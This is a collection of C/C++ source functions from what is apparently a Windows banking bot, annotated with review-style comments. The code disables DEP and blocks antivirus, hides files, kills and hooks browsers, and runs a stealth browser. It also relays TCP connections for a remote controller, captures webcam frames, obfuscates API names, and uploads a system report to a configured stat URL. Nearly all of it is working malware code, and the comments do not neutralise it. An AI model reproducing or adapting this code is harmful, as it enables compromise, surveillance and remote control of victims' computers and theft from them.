// Thread entry for the anti-AV component (lpData is unused).
// Calls DisableDEP() and UnhookDlls() (both defined elsewhere), starts
// AvBlockThread and MiniAVThread through StartThread(), and blocks until both
// have finished. It then terminates the whole process with exit code 1, so
// the trailing `return 0` is only reached if pExitProcess returns.
// The two thread handles are waited on but never closed.
DWORD WINAPI AvFuckThread( LPVOID lpData )
{
    DisableDEP();
    UnhookDlls();
    HANDLE hBlockAV = StartThread( AvBlockThread, NULL );
    HANDLE hMiniAV = StartThread( MiniAVThread, NULL );
    pWaitForSingleObject( hBlockAV, INFINITE );
    pWaitForSingleObject( hMiniAV, INFINITE );
    // Process-wide exit once both workers are done.
    pExitProcess( 1 );
    return 0;
}
// Removes the relay entry with id uBid from the global Connections table
// (guarded by hThreadMutex) and closes its outbound socket (thread_s).
// The table is kept dense: the last entry is moved into the freed slot, so
// indices obtained from FindConn() are not stable across this call.
void DisconnBid( USHORT uBid )
{
    pWaitForSingleObject( hThreadMutex, INFINITE );
    int k = FindConn( uBid );
    if ( k != -1 )
    {
        // Work on a copy of the entry; the slot's socket is invalidated
        // before the copy's socket is shut down and closed.
        ThreadConnection Conn = Connections[ k ];
        Connections[ k ].thread_s = INVALID_SOCKET;
        if ( Conn.thread_s != INVALID_SOCKET )
        {
            // NOTE(review): FD_READ is a WSAAsyncSelect event mask, not a
            // shutdown() "how" value (SD_RECEIVE/SD_SEND) — confirm intent.
            pshutdown( Conn.thread_s, FD_READ );
            pshutdown( Conn.thread_s, SD_SEND );
            pclosesocket( Conn.thread_s );
        }
        dwConnections--;
        // Compact the table by moving the last entry into the hole.
        if ( dwConnections )
        {
            Connections[ k ] = Connections[ dwConnections ];
        }
    }
    pReleaseMutex( hThreadMutex );
}
// Registers a new relay entry on behalf of the control connection `Socket`.
// uIP/uPort name the target to connect to, uCid is the id assigned by the
// controller; a local id (bid) is derived from the global counter dwBid.
// The outbound TCP connection is opened synchronously via NetConnect() while
// hThreadMutex is held, so every other table operation blocks for the
// duration of the connect. A ConnectionThread is then started with the bid
// as its argument. Does nothing when the table already holds MAX_CONN entries.
void ManageNewConnection( SOCKET Socket, ULONG uIP, USHORT uCid, USHORT uPort)
{
    pWaitForSingleObject( hThreadMutex, INFINITE );
    if ( dwConnections < MAX_CONN )
    {
        Connections[ dwConnections ].thread_s = INVALID_SOCKET;
        Connections[ dwConnections ].s = Socket;
        Connections[ dwConnections ].ip = uIP;
        Connections[ dwConnections ].port = uPort;
        Connections[ dwConnections ].cid = uCid;
        // dwBid is truncated to 16 bits before the +1, so ids wrap after 65535.
        Connections[ dwConnections ].bid = (USHORT)dwBid + 1;
        in_addr in;
        in.S_un.S_addr = uIP;
        // Blocking connect to the requested target; the mutex stays held.
        Connections[ dwConnections ].thread_s = NetConnect( (char*)pinet_ntoa( in ), uPort );
        dwBid++;
        DWORD ThreadId = 0;
        dwConnections++;
        // The bid (an integer, not a pointer) is passed through the LPVOID
        // parameter; ConnectionThread casts it back.
        Connections[ dwConnections - 1 ].hThread = pCreateThread( NULL, 0, ConnectionThread, (void*)Connections[ dwConnections - 1 ].bid, 0, &ThreadId );
    }
    pReleaseMutex( hThreadMutex );
}
// Host-level single-instance guard.
// Builds the name "Global\\" + MutexPrefix + MakeMachineID() — the same
// prefix yields the same name on a given host, which makes it a stable,
// observable artifact in the Global object namespace — creates the mutex
// with a NULL DACL (no access restrictions on the object) and tries to take
// ownership within 1 s.
// Returns true when ownership was obtained; the handle is deliberately kept
// open and never released so this process stays owner for its lifetime.
// Returns false when the mutex could not be created or is owned elsewhere.
// mutex_name is a fixed 200-byte buffer and the concatenations are not
// length-checked, so MutexPrefix plus the machine id must fit — confirm at
// the call sites.
bool TryToCatchHostLevelInstanceMutex(const char* MutexPrefix)
{
    CHAR mutex_name[200];
    m_memset(mutex_name, 0, sizeof(mutex_name));
    PCHAR machine_id = MakeMachineID();
    m_lstrcat(mutex_name, "Global\\");
    m_lstrcat(mutex_name, MutexPrefix);
    m_lstrcat(mutex_name, machine_id);
    STR::Free(machine_id);
    LDRDBG("TryToCatchHostLevelInstanceMutex", "Mutex name '%s'.", mutex_name);
    SECURITY_ATTRIBUTES sa;
    SECURITY_DESCRIPTOR sd;
    pInitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION);
    // bDaclPresent=TRUE with pDacl=NULL is a NULL DACL: everyone gets full access.
    pSetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE);
    sa.nLength = sizeof (SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor = &sd;
    sa.bInheritHandle = FALSE;
    HANDLE mutex_handle = (HANDLE)pCreateMutexA(&sa, FALSE, mutex_name);
    if (mutex_handle == NULL) return false;
    // Catch ownership of mutex and never release
    DWORD wait_result = (DWORD)pWaitForSingleObject(mutex_handle, 1000);
    if (wait_result == WAIT_OBJECT_0) return true;
    // Not acquired (timeout, abandoned or failed wait): drop our handle.
    pCloseHandle(mutex_handle);
    return false;
}
// Thread entry for the "hunter" component (lpData is unused).
// Behaviour as written:
//  - If HunterFileExists() already, run Hunting() once and return.
//  - Otherwise loop: open the mutex HunterMutexName and wait on it.
//    A non-zero wait status (WAIT_ABANDONED, or WAIT_FAILED when OpenMutexA
//    returned NULL) takes the polling branch: re-check the file, run
//    Hunting() if it exists, sleep 90 ms and retry; the handle is not closed
//    on this path.
//    WAIT_OBJECT_0 runs Hunting(), closes the handle, creates HunterFileName
//    under folder 0x001a (CSIDL_APPDATA) and leaves the loop.
DWORD WINAPI HuntThred( LPVOID lpData )
{
    // If the file is on disk, take the string from it and launch the SB
    // (the file contains the string 127.0.0.1:5555)
    if (HunterFileExists())
    {
        Hunting();
        return 0;
    }
    HANDLE tmp;
    while(true)
    {
        tmp= (HANDLE)pOpenMutexA(MUTEX_ALL_ACCESS,FALSE, (PCHAR)HunterMutexName);
        // Any non-zero status — including a failed wait on a NULL handle —
        // lands in the polling branch.
        if ((DWORD)pWaitForSingleObject(tmp, INFINITE))
        {
            if (HunterFileExists())//&&!IsSbStarted()
            {
                Hunting();
            }
            pSleep(90);
        }
        else
        {
            Hunting();
            pCloseHandle(tmp);
            FileCreateInFolder(0x001a, (PWCHAR)HunterFileName,NULL,0);
            break;
        }
    }
    return 0;
}
// Detour installed in place of ExitProcess.
// If the plugin-loading thread (ThreadHandle, managed elsewhere) is still
// running, block until it finishes before forwarding to the real
// ExitProcess, so a process exit does not cut the plugin load short.
VOID WINAPI Hook_ExitProcess(UINT Code)
{
    // Attempt to terminate the process: if the plugin loading thread is
    // running, wait for it to complete first.
    if (ThreadHandle != NULL) pWaitForSingleObject(ThreadHandle, INFINITE);
    Real_ExitProcess(Code);
}
// Blocks until the remote dialog signals m_hEventDlgOpen, then sleeps 150 ms.
// Both kernel32 APIs are resolved at run time from names assembled one
// character at a time on the stack, so "WaitForSingleObject" and "Sleep" do
// not appear as contiguous strings in the binary — an obfuscation pattern a
// reviewer or analyst should flag. LoadLibrary("KERNEL32.dll") is called
// without a matching FreeLibrary; harmless for kernel32 but it does bump the
// module reference count on every call.
void CManager::WaitForDialogOpen()
{
    char BrmAP30[] = {'W','a','i','t','F','o','r','S','i','n','g','l','e','O','b','j','e','c','t','\0'};
    WaitForSingleObjectT pWaitForSingleObject=(WaitForSingleObjectT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP30);
    pWaitForSingleObject(m_hEventDlgOpen, INFINITE);
    // The Sleep is required: there is a delay between the remote window
    // sending COMMAND_NEXT from InitDialog and the window actually showing.
    char FBwWp25[] = {'S','l','e','e','p','\0'};
    SleepT pSleep=(SleepT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp25);
    pSleep(150);
}
// Requests one frame from the capture window and returns the DIB buffer.
// capGrabFrameNoStop() asks for a single frame without stopping the preview;
// presumably the capture callback (not visible here) fills m_lpDIB and sets
// m_hCaptureEvent. Waits up to 3 s and returns m_lpDIB on WAIT_OBJECT_0,
// NULL on timeout or failure. WaitForSingleObject is resolved at run time
// from a stack-assembled name (the same obfuscation pattern used elsewhere
// in this class).
LPBYTE CVideoCap::GetDIB()
{
    capGrabFrameNoStop(m_hWndCap);
    char CPolQ01[] = {'W','a','i','t','F','o','r','S','i','n','g','l','e','O','b','j','e','c','t','\0'};
    WaitForSingleObjectT pWaitForSingleObject=(WaitForSingleObjectT)GetProcAddress(LoadLibrary("KERNEL32.dll"),CPolQ01);
    DWORD dwRet = pWaitForSingleObject(m_hCaptureEvent, 3000);
    if (dwRet == WAIT_OBJECT_0)
        return m_lpDIB;
    else
        return NULL;
}
// Opens a TCP connection to Host:Port with a 10 s per-attempt timeout, up to
// three attempts. Returns the connected SOCKET, or -1 when name resolution
// fails, socket creation fails, or every attempt fails.
// Only the first address from gethostbyname() is used. The connect itself
// runs in ConnectThread (elsewhere) on a stack-allocated ConnectionData; an
// attempt that exceeds 10 s has its socket shut down and the thread killed
// with TerminateThread(). An attempt counts as successful when the thread's
// exit code is 0 (ConnectThread's contract — confirm). Sockets from failed
// attempts and all thread handles are left open.
SOCKET MyConnect( char *Host, int Port )
{
    LPHOSTENT lpHost = (LPHOSTENT)pgethostbyname( (const char*)Host );
    if ( lpHost == NULL )
    {
        return -1;
    }
    sockaddr_in SockAddr;
    SockAddr.sin_family = AF_INET;
    // First entry of h_addr_list only.
    SockAddr.sin_addr.s_addr = **(unsigned long**)lpHost->h_addr_list;
    SockAddr.sin_port = (USHORT)phtons( (unsigned short)Port );
    ConnectionData connData;
    connData.SockAddr = SockAddr;
    for(int i=0; i<3; i++)
    {
        SOCKET Socket = (SOCKET)psocket( AF_INET, SOCK_STREAM, 0 );
        if( Socket == -1 ) return -1;
        connData.Socket = Socket;
        HANDLE ConnectThreadHandle = (HANDLE)pCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ConnectThread, &connData, NULL, 0);
        if((long)pWaitForSingleObject(ConnectThreadHandle, 10000) == WAIT_TIMEOUT)
        {
            // Abort the in-flight connect; the shutdown() result is ignored.
            if((int)pshutdown(Socket, 2) == SOCKET_ERROR)
            {
            }
            pTerminateThread(ConnectThreadHandle, 1);
        }
        DWORD exitCode = 0;
        BOOL res = (BOOL)pGetExitCodeThread(ConnectThreadHandle, &exitCode);
        //wsprintfA(&str[0], "EC:%d", exitCode);
        //OutputDebugStringA(&str[0]);
        if(res && exitCode == 0) return Socket;
    }
    return -1;
}
// Formats a command line from `msg` and its varargs (wvsprintfA into a
// 1024-byte TMemory buffer, matching wvsprintf's documented output limit),
// launches it with CreateProcessA, waits for the child to exit and optionally
// reports its exit code.
// exitCode: may be NULL; zeroed on entry and filled only when the child ran.
// Returns true when the process was created (regardless of its exit code),
// false when CreateProcessA failed (the last error is logged).
// wShowWindow = FALSE is 0, i.e. SW_HIDE, so the child shows no window.
static bool Exec( DWORD* exitCode, char *msg, ... )
{
    bool ret = false;
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    if( exitCode ) *exitCode = 0;
    va_list mylist;
    va_start( mylist, msg );
    TMemory buf(1024);
    pwvsprintfA( buf.AsStr(), msg, mylist );
    va_end(mylist);
    ClearStruct(pi);
    ClearStruct(si);
    si.cb = sizeof(si);
    pGetStartupInfoA(&si);
    // STARTF_USESHOWWINDOW is what makes wShowWindow take effect.
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = FALSE;
    DBG( "CreateProcess(): %s", buf.AsStr() );
    if( pCreateProcessA( NULL, buf.AsStr(), NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi) )
    {
        pWaitForSingleObject( pi.hProcess, INFINITE );
        if( exitCode ) pGetExitCodeProcess( pi.hProcess, exitCode );
        pCloseHandle(pi.hThread);
        pCloseHandle(pi.hProcess);
        ret = TRUE;
    }
    else
        DBG( "CreateProcess() ERROR %d", pGetLastError() );
    return ret;
}
// Tears down every relay entry: shuts down and closes each entry's outbound
// socket (thread_s), zeroes the used part of the Connections table and resets
// dwConnections. The control sockets (`s`) are not closed here.
// Guarded by hThreadMutex.
void KillAllConnections()
{
    pWaitForSingleObject( hThreadMutex, INFINITE );
    for ( DWORD i = 0; i < dwConnections; i++ )
    {
        ThreadConnection Conn = Connections[ i ];
        // NOTE(review): FD_READ is a WSAAsyncSelect event mask, not a
        // shutdown() "how" value (SD_RECEIVE/SD_SEND) — confirm intent.
        pshutdown( Conn.thread_s, FD_READ );
        pshutdown( Conn.thread_s, SD_SEND );
        pclosesocket( Conn.thread_s );
    }
    // NOTE(review): `&Connections` is the table's address only if Connections
    // is an array; if it is a pointer this zeroes the pointer variable — confirm.
    m_memset( &Connections, 0, sizeof( ThreadConnection ) * dwConnections );
    dwConnections = 0;
    pReleaseMutex( hThreadMutex );
    return;
}
// Start-up sequence executed in the explorer host process (Data is unused
// here). The steps run in this order; most are compiled in only when the
// matching module header is present. The final step starts the stealth
// browser thread and waits on it with INFINITE, so this function does not
// return while that thread is alive.
void ExplorerStart(PEventData Data)
{
    // Create the global mutex signalling that the bot is running
    BOT::TryCreateBotInstance();
    // Initialize the files that are to be hidden
    InitializeHiddenFiles();
    // Write the current settings to file.
    // The write only happens if no saved settings exist yet
    BOT::SaveSettings(true, true, true);
    // Kill all running browsers
    KillAllBrowsers();
#ifdef FakeDllInstallerH
    FDI::Execute();
#endif
#ifdef BBSCBankH
    CBank::Start();
#endif
#ifdef JAVS_PATCHERH
    StartThread(Run_Path, NULL);
#endif
    // Hook the WinInet library
#ifdef InternetExplorerH
    HookInternetExplorer();
#endif
    // Start the survivability (keep-alive) module
#ifdef KeepAliveH
    KeepAliveCheckProcess(PROCESS_SVCHOST);
#ifdef VideoRecorderH
#ifdef VideoProcessSvchost
    KeepAliveCheckProcess(PROCESS_VIDEO);
#endif
#endif
#endif
    // Check for the CyberPlat system
#ifdef CyberPlatDLLH
    CyberPlatCheckInstalled();
#endif
#ifdef CmdLineH
    HookCmdLine();
#endif
#ifdef BOTMONITOR
    PIPE::CreateProcessPipe((PCHAR)BotMonitor::ProcessExplorer, true);
#endif
#ifdef BitcoinH
    BitcoinRunAfterReboot();
#endif
#ifdef VideoRecorderH
    VideoProcess::ConnectToServer( 0, true );
#endif
    // Start the stealth browser thread.
    // IMPORTANT! This call must be made last
#ifdef StealthBrowserH
    HANDLE H = StartThread( RunIeSB/*SellExecute*/, NULL );// start the thread responsible for launching the browser
    pWaitForSingleObject(H, INFINITE);
#endif
}
// Command loop for one control session on `Socket` (the controller side of
// the relay). Each iteration waits up to 60*60 (presumably seconds) for data,
// reads a TPkt header and dispatches on QType:
//   0x63  open relay: payload must be exactly 6 bytes (4-byte IPv4 address,
//         2-byte port); dwReserved carries the controller's connection id
//         -> ManageNewConnection
//   0x73  relay data: payload is BcDecrypt()ed and sent to the entry whose
//         bid is dwReserved (looked up under hThreadMutex)
//   0x77  close the entry with bid dwReserved
//   0x64  close `Socket`, kill all relays and exit this thread
//   0x65  accepted and ignored
//   other ends the loop
// The loop also ends on a recv timeout/failure or an allocation failure.
// NOTE(review): MemAlloc( sizeof( PCONNECTIONS ) ) sizes the block by the
// PCONNECTIONS type itself (pointer-sized if, as the name suggests, it is a
// pointer typedef), and pConnect is never freed — confirm before relying on
// pConnect->dwStatus.
void SessionWork( SOCKET Socket )
{
    PCONNECTIONS pConnect = (PCONNECTIONS)MemAlloc( sizeof( PCONNECTIONS ) );
    m_memset( pConnect, 0, sizeof( PCONNECTIONS ) );
    char *Data = NULL;
    while ( 1 )
    {
        // Idle timeout for the control channel.
        if ( !WaitRecv( Socket, 60*60 ) )
        {
            break;
        }
        TPkt tPacket;
        if ( !NetRecv( Socket, (char*)&tPacket, sizeof( tPacket ) ) )
        {
            break;
        }
        if ( tPacket.QType == 0x63 )
        {
            if ( tPacket.dwLen != 6 )
            {
                break;
            }
            if ( Data )
            {
                MemFree( Data );
            }
            Data = (char *)MemAlloc( tPacket.dwLen + 1 );
            if ( Data == NULL )
            {
                break;
            }
            if ( !NetRecv( Socket, Data, tPacket.dwLen ) )
            {
                break;
            }
            // Payload layout: bytes 0-3 address, bytes 4-5 port, both as sent.
            ManageNewConnection( Socket, *(ULONG*)Data, (USHORT)tPacket.dwReserved, *(USHORT*)&Data[4] );
        }
        else if ( tPacket.QType == 0x73 )
        {
            if ( Data )
            {
                MemFree( Data );
            }
            // dwLen comes from the peer and is used as the allocation and
            // receive size without an upper bound.
            Data = (char *)MemAlloc( tPacket.dwLen + 1 );
            if ( Data == NULL )
            {
                break;
            }
            if ( !NetRecv( Socket, Data, tPacket.dwLen ) )
            {
                break;
            }
            BcDecrypt( Data, tPacket.dwLen );
            ThreadConnection Conn;
            pWaitForSingleObject( hThreadMutex, INFINITE );
            int k = FindConn( (USHORT)tPacket.dwReserved );
            if ( k != -1 )
            {
                Conn = Connections[ k ];
                // Blocking send to the target while hThreadMutex is held.
                NetSend( Conn.thread_s, Data, tPacket.dwLen );
            }
            pReleaseMutex( hThreadMutex );
        }
        else if ( tPacket.QType == 0x77 )
        {
            DisconnBid( tPacket.dwReserved );
        }
        else if ( tPacket.QType == 0x64 )
        {
            pclosesocket(Socket);
            KillAllConnections();
            // If pExitThread is ExitThread, the break and the cleanup below
            // are never reached on this path.
            pExitThread( 1 );
            break;
        }
        else if ( tPacket.QType == 0x65 )
        {
        }
        else
        {
            break;
        }
    }
    if ( Data )
    {
        MemFree( Data );
    }
    pConnect->dwStatus = 1;
}
// Downloads `Url` over HTTP using asynchronous WinINet and hands the body
// back as a heap buffer (*lpBuffer, *dwSize). Returns true on success; false
// when the URL cannot be parsed, an allocation fails, a WinINet call fails
// with anything other than ERROR_IO_PENDING, or dwSize is NULL.
// Flow: InternetOpenA(INTERNET_FLAG_ASYNC) with the urlmon user-agent string;
// the status callback `Callback` (elsewhere) is expected to signal the three
// events held in pData as the connect / open-request / request-complete
// stages finish; the body is read in 4096-byte chunks with
// InternetReadFileExA and appended to a MemRealloc'd buffer until a
// zero-length read marks completion. An empty body yields *lpBuffer == NULL
// with a true return.
// NOTE(review): the port parsed from the URL is ignored — the connection is
// always made on INTERNET_DEFAULT_HTTP_PORT.
// NOTE(review): every early `return false` after the handles are created
// skips the cleanup at the bottom (WinINet handles, events, pData, lpBuf);
// UserAgent and pTmpBuf are never freed on any path.
// NOTE(review): MemAlloc( sizeof( PASYNCHTTP ) ) sizes the block by the
// PASYNCHTTP type itself — confirm it is not a pointer typedef.
bool AsyncDownload( char *Url, LPBYTE *lpBuffer, LPDWORD dwSize )
{
    char *Host = NULL;
    char *Path = NULL;
    int Port = 0;
    if ( !ParseUrl( Url, &Host, &Path, &Port ) )
    {
        return false;
    }
    PASYNCHTTP pData = (PASYNCHTTP)MemAlloc( sizeof( PASYNCHTTP ) );
    if ( !pData )
    {
        return false;
    }
    // Auto-reset, initially unsignalled events, one per async stage.
    pData->hConnectedEvent = pCreateEventW( NULL, FALSE, FALSE, NULL );
    pData->hRequestOpenedEvent = pCreateEventW( NULL, FALSE, FALSE, NULL );
    pData->hRequestCompleteEvent = pCreateEventW( NULL, FALSE, FALSE, NULL );
    char *UserAgent = (char*)MemAlloc( 1024 );
    DWORD dwUserSize = 1024;
    // System user-agent string (urlmon), up to 1024 bytes.
    pObtainUserAgentString( 0, UserAgent, &dwUserSize );
    pData->hInstance = (HINTERNET)pInternetOpenA( UserAgent, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, INTERNET_FLAG_ASYNC );
    LPBYTE lpBuf = NULL;
    DWORD dwBufSize = 0;
    if ( pData->hInstance )
    {
        if ( pInternetSetStatusCallback( pData->hInstance, (INTERNET_STATUS_CALLBACK)&Callback) != INTERNET_INVALID_STATUS_CALLBACK)
        {
            // dwCurrent marks the pending stage (1: connect) — presumably read by Callback.
            pData->dwCurrent = 1;
            pData->hConnect = (HINTERNET)pInternetConnectA( pData->hInstance, Host, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, (DWORD_PTR)pData );
            if ( !pData->hConnect )
            {
                if ( pGetLastError() != ERROR_IO_PENDING )
                {
                    return false;
                }
                pWaitForSingleObject( pData->hConnectedEvent, INFINITE );
            }
            // Stage 2: open the GET request.
            pData->dwCurrent = 2;
            pData->hRequest = (HINTERNET)pHttpOpenRequestA( pData->hConnect, "GET", Path, NULL, NULL, NULL, INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE, (DWORD_PTR)pData );
            if ( !pData->hRequest )
            {
                if ( pGetLastError() != ERROR_IO_PENDING )
                {
                    return false;
                }
                pWaitForSingleObject( pData->hRequestOpenedEvent, INFINITE );
            }
            if ( !(BOOL)pHttpSendRequestA( pData->hRequest, NULL, 0, NULL, 0 ) )
            {
                if ( pGetLastError() != ERROR_IO_PENDING )
                {
                    return false;
                }
            }
            pWaitForSingleObject( pData->hRequestCompleteEvent, INFINITE );
            LPBYTE pTmpBuf = (LPBYTE)MemAlloc( 4096 );
            if ( !pTmpBuf )
            {
                return false;
            }
            INTERNET_BUFFERSA ib;
            m_memset( &ib, 0, sizeof( INTERNET_BUFFERSA ) );
            ib.dwStructSize = sizeof( INTERNET_BUFFERSA );
            ib.lpvBuffer = pTmpBuf;
            do
            {
                ib.dwBufferLength = 4096;
                if ( !(BOOL)pInternetReadFileExA( pData->hRequest, &ib, 0, 2 ) )
                {
                    if ( pGetLastError() == ERROR_IO_PENDING)
                    {
                        // Read completes asynchronously; Callback signals the event.
                        pWaitForSingleObject( pData->hRequestCompleteEvent, INFINITE );
                    }
                    else
                    {
                        return false;
                    }
                }
                if ( ib.dwBufferLength )
                {
                    // Grow the result buffer by the chunk just read (+1 spare byte).
                    if ( !lpBuf )
                    {
                        if ( !( lpBuf = (LPBYTE)MemAlloc( ib.dwBufferLength + 1 ) ) )
                        {
                            return false;
                        }
                    }
                    else
                    {
                        LPBYTE p = (LPBYTE)MemRealloc( lpBuf, dwBufSize + ib.dwBufferLength + 1 );
                        if ( !p )
                        {
                            return false;
                        }
                        lpBuf = p;
                    }
                    m_memcpy( lpBuf + dwBufSize, pTmpBuf, ib.dwBufferLength );
                    dwBufSize += ib.dwBufferLength;
                }
                else
                {
                    // Zero-length read: end of body.
                    pData->IsDownloaded = true;
                }
            } while ( !pData->IsDownloaded );
        }
    }
    pInternetCloseHandle( pData->hRequest );
    pInternetCloseHandle( pData->hConnect );
    pInternetCloseHandle( pData->hInstance );
    pCloseHandle( pData->hConnectedEvent );
    pCloseHandle( pData->hRequestOpenedEvent );
    pCloseHandle( pData->hRequestCompleteEvent );
    MemFree( pData );
    // The result is handed back only when a size out-pointer was supplied;
    // lpBuffer itself is not NULL-checked.
    if ( dwSize )
    {
        *lpBuffer = lpBuf;
        *dwSize = dwBufSize;
        return true;
    }
    return false;
}
// Per-relay worker thread; lpData carries the entry's bid (an integer passed
// through the pointer parameter; the (int) cast truncates it on 64-bit).
// Looks the entry up under hThreadMutex and, if its outbound socket is valid,
// reports success to the controller (SendStatus TRUE) and then pumps data
// from the target socket (thread_s) to the control socket (s): each recv()
// of up to 1024 bytes is sent as a TPkt header {dwLen=r, QType=0x73,
// dwReserved=bid} followed by the payload after BcDecrypt() — the same
// routine SessionWork applies to incoming data, so presumably a symmetric
// transform; confirm. A closed or failed recv() sends a 0x77 packet for this
// bid and ends the loop. If the outbound socket is invalid, SendStatus FALSE
// is sent instead, without taking hSockMutex (unlike the TRUE path).
// Always finishes with DisconnBid(bid).
DWORD WINAPI ConnectionThread( LPVOID lpData )
{
    int bid = (int)lpData;
    ThreadConnection Conn;
    pWaitForSingleObject( hThreadMutex, INFINITE );
    int k = FindConn( bid );
    if ( k != -1 )
    {
        Conn = Connections[ k ];
    }
    pReleaseMutex(hThreadMutex);
    if ( k != -1 )
    {
        if ( Conn.thread_s != INVALID_SOCKET )
        {
            // Fresh lookup (the table may have been compacted by DisconnBid
            // in the meantime), then write the copied socket back. The slot
            // normally already holds this value; the intent is not evident here.
            pWaitForSingleObject( hThreadMutex, INFINITE );
            k = FindConn( bid );
            if ( k != -1 )
            {
                Connections[ k ].thread_s = Conn.thread_s;
            }
            pReleaseMutex( hThreadMutex );
            // Writes to the control socket are serialized on hSockMutex.
            pWaitForSingleObject( hSockMutex, INFINITE );
            SendStatus( Conn.s, bid, Conn.cid, TRUE );
            pReleaseMutex( hSockMutex );
            char data[1024];
            while ( 1 )
            {
                int r = (int)precv( Conn.thread_s, data, 1024, 0 );
                if ( r == 0 || r == SOCKET_ERROR )
                {
                    // Target closed or failed: tell the controller to drop this bid.
                    pWaitForSingleObject( hSockMutex, INFINITE );
                    TPkt tPacket;
                    tPacket.dwLen = 0;
                    tPacket.QType = 0x77;
                    tPacket.dwReserved = bid;
                    NetSend( Conn.s, (char*)&tPacket, sizeof( tPacket ) );
                    pReleaseMutex( hSockMutex );
                    break;
                }
                pWaitForSingleObject( hSockMutex, INFINITE );
                TPkt tPacket;
                tPacket.dwLen = r;
                tPacket.QType = 0x73;
                tPacket.dwReserved = bid;
                NetSend( Conn.s, (char*)&tPacket, sizeof( tPacket ) );
                BcDecrypt( data, r );
                if ( !NetSend( Conn.s, data, r ) )
                {
                    pReleaseMutex( hSockMutex );
                    break;
                }
                pReleaseMutex( hSockMutex );
            }
        }
        else
        {
            SendStatus( Conn.s, bid, Conn.cid, FALSE );
        }
    }
    DisconnBid( bid );
    return 0;
}
// Builds a system-configuration report and uploads it.
// Runs msinfo32.exe (path from GetPathToMsInfo32()) with `/report "<temp>"`,
// waits for it to finish, packs the report into a CAB as "sysinfo.txt",
// derives a UID from settings->StatPrefix and posts the CAB to
// settings->StatUrl through DebugReportSendSysInfo(). Does nothing when
// settings->Enabled is false. Temp files are deleted and freed afterwards.
// Host-observable: an msinfo32.exe child with a /report argument spawned by
// this process, plus a temporary report file and CAB in the temp directory.
// As written si.dwFlags never gets STARTF_USESHOWWINDOW, so the SW_HIDE value
// is ignored and msinfo32 starts with its default window state.
// NOTE(review): MsInfoParam is never freed; the m_memset over
// STR::Length(MsInfoParam) clears only up to the first NUL of the freshly
// allocated string (a no-op if STR::Alloc zero-fills).
void DebugReportCreateConfigReportAndSend()
{
    PCHAR MsInfoPath = NULL;
    PCHAR MsInfoParam = NULL;
    PCHAR ReportPath = NULL;
    PCHAR CabPath = NULL;
    DebugReportSettings* settings = DebugReportGetSettings();
    DBGRPTDBG("DebugReportCreateConfigReportAndSend", "Started with settings: Enabled='%d' StatPrefix='%s' StatUrl='%s'", settings->Enabled, settings->StatPrefix, settings->StatUrl );
    if (!settings->Enabled) return;
    do
    {
        // Get the path to msinfo32.exe
        MsInfoPath = GetPathToMsInfo32();
        DBGRPTDBG("DebugReportCreateConfigReportAndSend", "GetPathToMsInfo32() return '%s;", MsInfoPath);
        if (MsInfoPath == NULL) break;
        // Temporary file for the report
        ReportPath = File::GetTempNameA();
        DBGRPTDBG("DebugReportCreateConfigReportAndSend", "GetTempNameA() for report file return '%s;", ReportPath);
        if (ReportPath == NULL) break;
        MsInfoParam = STR::Alloc(2 * MAX_PATH);
        if (MsInfoParam == NULL) break;
        PROCESS_INFORMATION pi;
        STARTUPINFOA si;
        m_memset(&si, 0, sizeof(si));
        m_memset(&pi, 0, sizeof(pi));
        m_memset(MsInfoParam, 0, STR::Length(MsInfoParam));
        // Launch hidden
        si.cb = sizeof(si);
        si.wShowWindow = SW_HIDE;
        // Command line is " /report \"<ReportPath>\""; the executable comes
        // from lpApplicationName.
        m_lstrcat(MsInfoParam, " /report \"");
        m_lstrcat(MsInfoParam, ReportPath);
        m_lstrcat(MsInfoParam, "\"");
        DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateProcess('%s', '%s')", MsInfoPath, MsInfoParam);
        BOOL process_result = (BOOL)pCreateProcessA(MsInfoPath, MsInfoParam, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
        DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateProcess return %d.(ph=0x%X pid=%d)", process_result, pi.hProcess, pi.dwProcessId);
        if (process_result == FALSE) break;
        if (pi.hProcess == NULL) break;
        // Always true after the check above.
        if (pi.hProcess != NULL)
        {
            DBGRPTDBG("DebugReportCreateConfigReportAndSend", "Waiting for msinfo32.");
            pWaitForSingleObject(pi.hProcess, INFINITE);
            pCloseHandle(pi.hProcess);
        }
        if (pi.hThread != NULL) pCloseHandle(pi.hThread);
        DWORD attributes = (DWORD)pGetFileAttributesA(ReportPath);
        DBGRPTDBG("DebugReportCreateConfigReportAndSend", "'%s' attibutes 0x%X.", ReportPath, attributes);
        if (attributes == INVALID_FILE_ATTRIBUTES) break;
        CabPath = File::GetTempNameA();
        HCAB CabHandle = CreateCab(CabPath);
        DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateCab() return 0x%X.", CabHandle);
        if (CabHandle == NULL) break;
        AddFileToCab(CabHandle, ReportPath, "sysinfo.txt");
        CloseCab(CabHandle);
        DBGRPTDBG("DebugReportCreateConfigReportAndSend", "sending sysinfo report.");
        string BotUid = GenerateUidAsString(settings->StatPrefix);
        DebugReportSendSysInfo(BotUid.t_str(), settings->StatUrl, CabPath);
        DBGRPTDBG("DebugReportCreateConfigReportAndSend", "sysinfo report sent.");
    } while (false);
    // Cleanup runs on every exit path of the do/while above.
    if (ReportPath != NULL) pDeleteFileA(ReportPath);
    if (CabPath != NULL) pDeleteFileA(CabPath);
    if (ReportPath != NULL) STR::Free(ReportPath);
    if (CabPath != NULL) STR::Free(CabPath);
    if (MsInfoPath != NULL) STR::Free(MsInfoPath);
    DebugReportFreeSettings(settings);
    DBGRPTDBG("DebugReportCreateConfigReportAndSend", "finished.");
}
// Function that is called after injection into other processes.
// Checks its own privileges and tries to extend them.
//
// Control flow as written (lpData is unused):
//  1. UnhookDlls(), rebuild imports; if the user is not an admin, call
